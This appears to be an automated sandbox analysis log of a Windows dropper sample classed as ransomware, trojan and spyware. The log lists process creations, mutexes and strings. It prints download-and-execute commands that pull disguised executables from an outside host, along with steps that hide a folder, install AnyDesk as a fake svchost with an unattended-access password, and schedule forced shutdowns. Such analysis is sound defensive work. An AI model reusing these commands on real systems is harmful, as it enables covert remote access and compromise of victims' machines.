    Source: AnyDesk.exe.42.drStatic PE information: No import functions for PE file found
    Source: Yv24LkKBY6.exe, 00000000.00000003.20222480541.00000000005BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs Yv24LkKBY6.exe
    Source: Yv24LkKBY6.exe, 00000000.00000003.20237112937.0000000000589000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAcroRd32.exe< vs Yv24LkKBY6.exe
    Source: Yv24LkKBY6.exe, 00000000.00000003.20237112937.0000000000589000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAcroRd) vs Yv24LkKBY6.exe
    Source: Yv24LkKBY6.exe, 00000000.00000003.20237112937.00000000005D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs Yv24LkKBY6.exe
    Source: Yv24LkKBY6.exe, 00000000.00000003.20223929270.00000000005BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs Yv24LkKBY6.exe
    Source: Yv24LkKBY6.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
    Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@139/246@4/8
    Source: 131.pdf.0.drInitial sample: http://www.pdf-tools.com\
    Source: C:\Intel\curl.exeCode function: 34_2_001D23B0 GetLastError,FormatMessageA,GetLastError,SetLastError,34_2_001D23B0
    Source: C:\Intel\driver.exeCode function: 40_2_0042FB20 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,40_2_0042FB20
    Source: C:\Intel\driver.exeCode function: 40_2_0040C734 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,40_2_0040C734
    Source: C:\Intel\driver.exeCode function: 40_2_004042E8 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,40_2_004042E8
    Source: C:\Intel\Trays\4t-min64.exeCode function: 43_2_004205E0 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,43_2_004205E0
    Source: C:\Intel\Trays\Trays.exeCode function: 41_2_00407C5E FreeResource,41_2_00407C5E
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt22.lst.4348Jump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1572:304:WilStaging_02
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4912:304:WilStaging_02
    Source: C:\Intel\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_qipcmtx_3588_1856_3
    Source: C:\Intel\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_qipcmtx_3440_5796_0
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2432:120:WilError_03
    Source: C:\Intel\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_qipcmtx_3588_1856_6
    Source: C:\Intel\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_qipcmtx_3588_1856_7
    Source: C:\Intel\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_qipcmtx_3588_1856_4
    Source: C:\Intel\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_qipcmtx_3588_1856_5
    Source: C:\Intel\AnyDesk\AnyDesk.exeMutant created: \BaseNamedObjects\Global\ad_8014_gsystem_mtx
    Source: C:\Intel\AnyDesk\AnyDesk.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_qipcmtx_2728_3124_0
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5392:304:WilStaging_02
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1892:120:WilError_03
    Source: C:\Intel\AnyDesk\AnyDesk.exeMutant created: \BaseNamedObjects\Global\ad_qipcmtx_2596_3364_7
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5060:304:WilStaging_02
    Source: C:\Intel\AnyDesk\AnyDesk.exeMutant created: \BaseNamedObjects\Global\ad_qipcmtx_2596_3364_6
    Source: C:\Intel\AnyDesk\AnyDesk.exeMutant created: \BaseNamedObjects\Global\ad_qipcmtx_2596_3364_5
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5320:120:WilError_03
    Source: C:\Intel\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Session\1\ad_connect_queue_3588_2573224360_mtx
    Source: C:\Intel\AnyDesk\AnyDesk.exeMutant created: \BaseNamedObjects\Global\ad_qipcmtx_2596_3364_4
    Source: C:\Intel\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_qipcmtx_3588_1856_20
    Source: C:\Intel\AnyDesk\AnyDesk.exeMutant created: \BaseNamedObjects\Global\ad_qipcmtx_2596_3364_3
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:304:WilStaging_02
    Source: C:\Intel\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_qipcmtx_3588_1856_21
    Source: C:\Intel\AnyDesk\AnyDesk.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_mailbox_808_2675748819_1_mtx
    Source: C:\Intel\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_mailbox_7000_2563006802_1_mtx
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:812:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2936:304:WilStaging_02
    Source: C:\Intel\AnyDesk\AnyDesk.exeMutant created: \BaseNamedObjects\Global\ad_qipcmtx_2596_3364_24
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5060:120:WilError_03
    Source: C:\Intel\AnyDesk\AnyDesk.exeMutant created: \BaseNamedObjects\Global\ad_qipcmtx_2596_3364_21
    Source: C:\Intel\AnyDesk\AnyDesk.exeMutant created: \BaseNamedObjects\Global\ad_qipc_ipc_svc_buf_mtx
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2120:304:WilStaging_02
    Source: C:\Intel\AnyDesk\AnyDesk.exeMutant created: \BaseNamedObjects\Global\ad_qipcstobjmtx
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3456:304:WilStaging_02
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:812:304:WilStaging_02
    Source: C:\Intel\AnyDesk\AnyDesk.exeMutant created: \BaseNamedObjects\Global\ad_qipcmtx_2596_3364_29
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7860:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7860:304:WilStaging_02
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1892:304:WilStaging_02
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6632:304:WilStaging_02
    Source: C:\Intel\AnyDesk\AnyDesk.exeMutant created: \BaseNamedObjects\Global\ad_connect_queue_2596_2618423021_mtx
    Source: C:\Intel\AnyDesk\AnyDesk.exeMutant created: \BaseNamedObjects\Global\ad_qipcmtx_2596_3364_16
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:120:WilError_03
    Source: C:\Intel\AnyDesk\AnyDesk.exeMutant created: \BaseNamedObjects\Global\ad_qipcmtx_2596_3364_15
    Source: C:\Intel\AnyDesk\AnyDesk.exeMutant created: \BaseNamedObjects\Global\ad_qipcmtx_2596_3364_14
    Source: C:\Intel\AnyDesk\AnyDesk.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_qipcstobjmtx
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2432:304:WilStaging_02
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3456:120:WilError_03
    Source: C:\Intel\AnyDesk\AnyDesk.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_qipcmtx_2728_1096_0
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5320:304:WilStaging_02
    Source: C:\Intel\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_8014_lsystem_mtx
    Source: C:\Intel\AnyDesk\AnyDesk.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_mailbox_2728_2644641245_0_mtx
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6028:304:WilStaging_02
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6632:120:WilError_03
    Source: C:\Intel\AnyDesk\AnyDesk.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_trace_mtx
    Source: C:\Intel\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_qipcmtx_3440_1488_0
    Source: C:\Intel\AnyDesk\AnyDesk.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_mailbox_7952_2648798460_0_mtx
    Source: C:\Intel\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_mailbox_3440_2575070825_0_mtx
    Source: C:\Intel\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_mailbox_7000_2563006802_0_mtx
    Source: C:\Intel\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_mailbox_3440_2575070825_1_mtx
    Source: C:\Intel\AnyDesk\AnyDesk.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_mailbox_2728_2644641245_1_mtx
    Source: C:\Intel\AnyDesk\AnyDesk.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_mailbox_7952_2648798460_1_mtx
    Source: C:\Intel\AnyDesk\AnyDesk.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_mailbox_808_2675748819_0_mtx
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2936:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6028:120:WilError_03
    Source: C:\Intel\AnyDesk\AnyDesk.exeMutant created: \BaseNamedObjects\Local\ad_trace_mtx
    Source: C:\Intel\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_qipcmtx_3588_1856_12
    Source: C:\Intel\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_qipcmtx_3588_1856_13
    Source: C:\Intel\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_qipcmtx_3588_1856_14
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1572:120:WilError_03
    Source: C:\Intel\Trays\Trays.exeMutant created: \Sessions\1\BaseNamedObjects\TrayMinimizer
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4912:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5392:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2120:120:WilError_03
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeFile created: C:\Users\user\AppData\Local\Temp\$instJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Intel\AnyDesk\bat.bat" "
    Source: C:\Intel\Trays\Trays.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
    Source: C:\Intel\Trays\Trays.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
    Source: C:\Intel\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
    Source: C:\Intel\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
    Source: C:\Intel\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
    Source: C:\Intel\AnyDesk\AnyDesk.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
    Source: C:\Intel\AnyDesk\AnyDesk.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
    Source: C:\Intel\AnyDesk\AnyDesk.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
    Source: C:\Intel\AnyDesk\AnyDesk.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
    Source: C:\Intel\dc.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
    Source: C:\Intel\AnyDesk\AnyDesk.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessorId FROM Win32_Processor
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeFile read: C:\Program Files (x86)\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: Yv24LkKBY6.exeVirustotal: Detection: 64%
    Source: Yv24LkKBY6.exeReversingLabs: Detection: 55%
    Source: Yv24LkKBY6.exeString found in binary or memory: /c echo>>@$&%17\Intel\rezet.cmd svchost.exe --install C:\Intel\AnyDesk
    Source: curl.exeString found in binary or memory: curl: try 'curl --help' or 'curl --manual' for more information
    Source: curl.exeString found in binary or memory: curl: try 'curl --help' or 'curl --manual' for more information
    Source: curl.exeString found in binary or memory: curl: try 'curl --help' or 'curl --manual' for more information
    Source: curl.exeString found in binary or memory: curl: try 'curl --help' or 'curl --manual' for more information
    Source: svchost.exeString found in binary or memory: --install
    Source: svchost.exeString found in binary or memory: --new-install
    Source: svchost.exeString found in binary or memory: AnyDesk-Address:
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeFile read: C:\Users\user\Desktop\Yv24LkKBY6.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\Yv24LkKBY6.exe "C:\Users\user\Desktop\Yv24LkKBY6.exe"
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Intel\ 131.pdf"
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c echo>C:\Intel\rezet.cmd cd C:\Intel\
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\SysWOW64\attrib.exe "C:\Windows\System32\attrib.exe" +s +h C:\Intel
    Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd ping -n 6 127.0.0.1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\driver.exe http://downdown.ru/driver.jpg
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\blat.exe http://downdown.ru/blat.jpg
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\svchost.exe http://downdown.ru/svchost.jpg
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\Trays.rar http://downdown.ru/Trays.jpg
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\AnyDesk\wol.ps1 http://downdown.ru/wol.jpg
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\dc.exe http://downdown.ru/dc.jpg
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\driver.exe x -r -ep2 -hplimpid2903392 C:\Intel\Trays.rar C:\Intel\ /y
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd svchost.exe --install C:\Intel\AnyDesk
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\AnyDesk\bat.lnk
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Intel\rezet.cmd" "
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 6 127.0.0.1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Intel\curl.exe C:\Intel\curl.exe -o C:\Intel\driver.exe http://downdown.ru/driver.jpg
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Intel\curl.exe C:\Intel\curl.exe -o C:\Intel\blat.exe http://downdown.ru/blat.jpg
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Intel\curl.exe C:\Intel\curl.exe -o C:\Intel\svchost.exe http://downdown.ru/svchost.jpg
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Intel\curl.exe C:\Intel\curl.exe -o C:\Intel\Trays.rar http://downdown.ru/Trays.jpg
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Intel\curl.exe C:\Intel\curl.exe -o C:\Intel\AnyDesk\wol.ps1 http://downdown.ru/wol.jpg
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Intel\curl.exe C:\Intel\curl.exe -o C:\Intel\dc.exe http://downdown.ru/dc.jpg
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Intel\driver.exe C:\Intel\driver.exe x -r -ep2 -hplimpid2903392 C:\Intel\Trays.rar C:\Intel\ /y
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Intel\Trays\Trays.exe "C:\Intel\Trays\Trays.exe" -tray
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Intel\svchost.exe svchost.exe --install C:\Intel\AnyDesk
    Source: C:\Intel\Trays\Trays.exeProcess created: C:\Intel\Trays\4t-min64.exe "C:\Intel\Trays\4t-min64.exe" "C:\Intel\Trays\ShellEh6055x64.dll"
    Source: C:\Intel\svchost.exeProcess created: C:\Intel\svchost.exe "C:\Intel\svchost.exe" --local-service
    Source: C:\Intel\svchost.exeProcess created: C:\Intel\svchost.exe "C:\Intel\svchost.exe" --local-control
    Source: unknownProcess created: C:\Intel\AnyDesk\AnyDesk.exe "C:\Intel\AnyDesk\AnyDesk.exe" --service
    Source: unknownProcess created: C:\Intel\AnyDesk\AnyDesk.exe "C:\Intel\AnyDesk\AnyDesk.exe" --control
    Source: unknownProcess created: C:\Intel\AnyDesk\AnyDesk.exe "C:\Intel\AnyDesk\AnyDesk.exe" --new-install
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Intel\curl.exe C:\Intel\curl.exe -o C:\Intel\AnyDesk\bat.bat http://downdown.ru/bat.jpg
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Intel\AnyDesk\bat.bat" "
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo QWERTY1234566 "
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Intel\AnyDesk\AnyDesk.exe AnyDesk.exe --set-password _unattended_access
    Source: C:\Intel\AnyDesk\AnyDesk.exeProcess created: C:\Intel\AnyDesk\AnyDesk.exe "C:\Intel\AnyDesk\AnyDesk.exe" --crash-handler
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Intel\dc.exe C:\Intel\dc.exe /D
    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetSvcs -p -s NcaSvc
    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
    Source: C:\Intel\dc.exeProcess created: C:\Intel\dc.exe "C:\Intel\dc.exe" /SYS 1
    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetSvcs -p -s NcaSvc
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg -setacvalueindex SCHEME_CURRENT 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg -change -standby-timeout-ac 0
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg -change -hibernate-timeout-ac 0
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg -h off
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "ShutdownAt5AM" /tr "shutdown /s /f /t 0" /sc daily /st 05:00
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -executionpolicy remotesigned -File C:\Intel\AnyDesk\wol.ps1
    Source: unknownProcess created: C:\Windows\System32\shutdown.exe C:\Windows\system32\shutdown.EXE /s /f /t 0
    Source: C:\Windows\System32\shutdown.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Intel\ 131.pdf"Jump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c echo>C:\Intel\rezet.cmd cd C:\Intel\Jump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\SysWOW64\attrib.exe "C:\Windows\System32\attrib.exe" +s +h C:\IntelJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd ping -n 6 127.0.0.1Jump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\driver.exe http://downdown.ru/driver.jpgJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\blat.exe http://downdown.ru/blat.jpgJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\svchost.exe http://downdown.ru/svchost.jpgJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\Trays.rar http://downdown.ru/Trays.jpgJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\AnyDesk\wol.ps1 http://downdown.ru/wol.jpgJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\dc.exe http://downdown.ru/dc.jpgJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\driver.exe x -r -ep2 -hplimpid2903392 C:\Intel\Trays.rar C:\Intel\ /yJump to behavior
